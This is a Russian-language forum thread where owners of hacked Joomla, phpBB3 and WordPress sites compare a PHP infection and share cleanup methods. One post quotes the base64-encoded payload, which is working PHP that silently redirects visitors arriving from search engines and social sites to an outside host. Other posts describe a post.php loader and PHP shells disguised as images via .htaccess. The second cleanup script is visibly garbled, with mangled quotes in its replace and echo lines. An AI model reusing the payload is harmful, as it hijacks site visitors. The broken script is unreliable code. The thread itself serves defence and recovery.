А нужно ли так подробно описывать методику работы таких вещей, да ещё и с чистым кодом?

Остаётся лишь чуток доработать код и в путь?

я посмотрел у меня статистика как то резко упала если в среднем на один из моих проектов заходило около 1500 а потом начало 600 и т.д. хотя все странице в выдачи были на своих местах я подумал еще один счетчик поставить и когда залез в index.php начал просматривать по всем файлам и все файлы с расширением php были заражены код был примерно такой 

nJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGFwcHluZXd5ZWFyLm9zYS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));

золотые слова

У меня тот же код , как и у вас. Поражены все файлы php в рнрВВ3 и Джумле 1.5

Тут спрашивают , как искать ?

Улыбнуло. Берете файл с сервера и открываете в редакторе и первая строчка увиденная принесет вам много "радости" Мне проще у меня сервер под Виндой 2008 и я по "Удаленному рабочему столу" это делаю быстро. А вот владельцам линуЛОХА с фЕтЕпЕ тут не по завидуешь.

Извините, что ерничаю, но мой опыт работы в инете показал, что лучше закрытых исходников ничего нет. По крайне мере на 90% спишь спокойно. 

Пффе, по SSH открывается консоль, а в ней Midnight Commander - это как нортон коммандер. В нём почти как удалённый рабочий стол. Можно так делать. А вообще- шаблоны не надо брать ворованные, а CMS держать на свежей версии. Остерегайтесь .htaccess php shell в виде картинок - есть каталог, где добавлено AddTypeHandler .png Application-PHP , как-то так. Тогда рядом в этом каталоге обязательно сидит пхп шелл.

Проблема повторилась ёпрст. Прям буквально через часа 3 всё заново, только кода в конфиге нет. буду искать где он теперь ((((((((

Тоже такая папка в корне появилась! xmlrpc

Как же с этим бороться то вообще?

Просто вы не внимательно прочитали ВСЮ эту тему. Прежде всего нужно воспользоваться легальным антивирусным сканером типа Dr.Webb(он кстати бесплатный) и проверить весь сервер или хост и ОБЯЗАТЕЛЬНО компы всех кто имеет доступ к админкам.

Вручную проверяються ВСЕ файлы расширения php имеющиеся на сервере. Еще раз повторяю ВСЕ и не плохо бы указывать По сайта, которое вы используете. На время проверок и не только обратите внимание на рекламные банеры , лучше их снять, а если сомнительные , то вообще отказаться. 

Дыра естественно осталась, надеюсь что отправленые нами коды на Яндекс расшифруют и выложат алгоритм.

Програмку учту посмотрю. Вот за это спасибо ! 

Но. папка xmlrpc она идёт вместе с джумлой, я не понял, её удалять или нет?

Кстати, на сайте около 500 таких кодов было. удалял прогой Notepad ++  Быстро очень. а то ручками наверно неделю бы сидел.

Скорей всего вирус пускают через загрузчик post.php. появляется в папке с картинками. а оттуда расползается как червяк

Блин, опять такая же ерунда (((((((. Написал хостеру.

Коллеги, ка залатать дыру? Кто знает?

у меня год назад такое было.

проблема была в том что вирус залез в фтп клиент и там вычитал сохранные пароли.

это не проблема джумлы.

у меня как на джумле так на друпал сайт заразился.

и даже на джумле 1.6.

ПАРОЛЬ по ФТП был перехвачен

кстати кто где хостяится.. может хостер дырявый?

я на jino.ru

nic.ru

Я думаю, что проблемы с хостерами надуманые, к примеру jino.ru это один из лучших и по коллективу и по услугам хостинг центр, отличные ребята и до сих пор дружу с ними. Хотя сам я на Инфобоксе, он мне больше подходит по тех.характеристикам.

Код сработал сразу и на всех сайтах, кроме с поддоменами третьего уровня....это у меня. И у меня вообще на Сервере2008 нет долбаного фЕтЕпЕ. Я думаю но пока только думаю, что была запущена не целевая инсталяция кода, а на дурака. У кого сработает. У меня разные зоны доменов, так что утверждения, что крысеныши работали в обозначеной доменной зоне тоже отпадает. Код был запущен на инсталяцию в рнр, то есть крысеныши нашли лазейку на уровне открытого кода. Я представляю сейчас, как эти крысы сидят и довольные читают, как мы тут гадаем на кофейной гуще. А все может быть очень просто.  

На есть ли на каком-нибудь джумловском форуме информация о нашей беде и как ее вылечить железно?

Скорее всего ответ есть на помойках крысенышей. Потому что заражение не только по джумле было и джумла очень легко чистится востановлением из архива. Ее вообще можно вручную не чистить, а тупо удалять папку с сервера , создать новую, закинуть бэк-ап и счастливо ковырять в носу. Вот с рнрВВ действительно проблема , особенно если они напиханы модификациями. На линуЛоховых серверах это тяжело чистится. Но к сожалению в этом топике больше жалуются владельцы Джуумлы и причем я вас не совсем понимаю.... Как это так не иметь бэкап сайта ??????????????? Ведь востановить Джуумлу нескольких минут дело .

у меня та же самая проблема. всего три сайта - два на жумле 1.5, другой на самописной мини-админке. первый раз когда попал вирус - поменял все пароли (кроме sql), закинул чистые файлы сайтов с бекапа. потом произошло еще один раз. опять поменял пароли, установил ограничение на папки с 775 на 555 (самописная админка) и 755 (джумла, тк модуль не работал с 555). добавил php.ini с блокировками. через день всё произошло снова, НО джумла осталосась цела, а вот самописные сайт опять пострадал. Сейчас опять вытащил бекапы. пароль не менял пока. тесчу свой пк на вирусы, хотя последнее крайне маловероятно, но вдруг... вообщем думаем дальше )

Я при востановлении из бэкапов менял БД. У меня Сервер2008 там это легко без всяких прописЁвываний. Потом через sqlЭкспресс выкидывал зараженные БД. С рнрВВ3 было чуть по сложней но тоже довольно быстро справился. Кстати когда востанавливаешь Джумлу из бэкапа , то там же есть функция изменить БД.

В линухе все чистится одной командой 

for fname in `find ./ -name '*'`; do sed -i 's/old_text/new_text/g' $fname; done

Может кому пригодится

JOOMLA 1.5.25 и WP на SWEB.ru заражены, Плюс один на NIC.RU пользовался FileZilla FTP Client, проблему поека не решил..., жесткачь блин.

папка xmlrpc неотъемлемая часть joomla, посмотрите например в чистую джумлу, или просто почитайте в инете например тут - http://kjoomla.com/station/34-joomla/70-pluginsjoomla.html

Что касается чистки вредоносного кода по всей среде php файлов то самым удобным нашел этот вариант :

создайте php файл и назовите к примеру 1.php :

$root  =  $_SERVER['DOCUMENT_ROOT'];

$search = 'eval(base64_decode("........весь зашифрованый код                    '; //строка, которую нужно найти в каждом файле и заменить на ''

$thisfile = '1.php'; //чтобы в процессе не заменить искомую строку в этом же файле

function find_and_replace($dir,$search,$thisfile)

{

$new_dir = null;

$dir_files = opendir($dir);

    while(false !== ($file = readdir($dir_files)))

    {

        if($file != '.' && $file != '..')

        $new_dir[] = $dir."/".$file;

    }

        if($new_dir)

        foreach($new_dir as $check )

        {

              if((is_file($check)) && (basename($check) !== $thisfile)) {

                $handle = fopen($check, "rb");

                $contents = '';

                while (!feof($handle)) {

                  $contents .= fread($handle, 8192);

                }

                fclose($handle);

                if (strpos($contents,$search) !== false) {

                    $file = fopen ($check,"w+");

                    $str = str_replace($search,'',$contents);

                    fputs($file, $str);

                    fclose ($file);

                    echo $check."
";

                    }

              }

              elseif(is_dir($check))

              find_and_replace($check,$search,$thisfile);

        }

}

find_and_replace($root,$search,$thisfile);

Далее запустите скрипт и он автоматически вычистит бяку(у меня вычистил около 1500 файлов), правда к слову сказать не везде например в xmlrpc придется чистить в ручную.

Все бы хорошо и системы диагностики в том числе Яндекса пишут что вируса нет, но вот в поисковой выдаче редирект остался и на Яндексе и на Гугле, возможно просто надо подождать апдейта индексирования, пока не ясно.

После удаления всех этих сигнатур в поиске должно все быть в норме и попадать на ваш сайт... Скорее Вы не все удалили... У меня после удаления все пришло внорму)

Немного модифицировал для удобства.

$cntfiles=0;

$root  =  $_SERVER['DOCUMENT_ROOT'];

$search = 'eval(base64_decode('; //строка, которую нужно найти в каждом файле и заменить на '' )
$search1 = 'base64_decode('; //строка, которую нужно найти в каждом файле и заменить на '' )

$thisfile = '????.php'; //чтобы в процессе не заменить искомую строку в этом же файле
// при поиске и только отображении проверяем все файлы, даже сам себя, а вдруг дополнительно заражен.

function find_and_replace($dir,$search,$thisfile)

{

global $cntfiles;
global $root;
global $search;
global $search1;
global $thisfile;

$new_dir = null;

$dir_files = opendir($dir);

    while(false !== ($file = readdir($dir_files)))

    {

 

        if($file != '.' && $file != '..')

        $new_dir[] = $dir."/".$file;

    }

 

        if($new_dir)

        foreach($new_dir as $check )

        {

              if((is_file($check)) && (basename($check) !== $thisfile)) {

                 $cntfiles=$cntfiles + 1;

                $handle = fopen($check, "rb");

                $contents = '';

                while (!feof($handle)) {

                  $contents .= fread($handle, 8192);

                }

                fclose($handle);

                $ps1=0;

               while (strpos($contents,$search1,$ps1) !== false) {
                   $ps1=strpos($contents,$search1,$ps1);
                   $ps1_e=strpos($contents,')',$ps1);


                    echo 'File - '.$check;

                if (strpos($contents,$search,$ps1) !== false) {
                    echo ' eval(';
                    }

            echo ' base64_decode';
                    $coded1=substr($contents,$ps1+14, $ps1_e-$ps1-14);
                    if ((substr($coded1,0,1)==='"') || (substr($coded1,0,1)==="'"))
            {
             $coded1=substr($coded1,1,strlen($coded1)-2);
            }
            echo '('.$coded1.')
Pos='.$ps1.' Len='.strlen($coded1).'
';
               $coded1=base64_decode($coded1);
                    $coded1 = str_replace('                    echo ''.$coded1.'

';
            $ps1=$ps1+($ps1_e-$ps1-14);

                    }
              }

              elseif(is_dir($check))
              find_and_replace($check,$search,$thisfile);
        }
}
find_and_replace($root,$search,$thisfile);
echo 'Check '.$cntfiles.' files';

надо бы попробовать прогромульку словоед, благодарю!

Теперь http://www.virusdie.ru находит и лечит редиректы с мобильных устройств

POST.PHP удалил нах...из корневой папки Загрузил туда скрипт, но пишет, файл скрипта антивируса не найден в корне сайта! Плять...Что это может быть????

Вероятно, речь о сайте: dizainersky.ru ? Возможно, затык в настройках хоста. Сейчас постараемся разобраться.

Посмотрите настройки .htaccess При запросе скрипта антивируса происходит редирект на 404.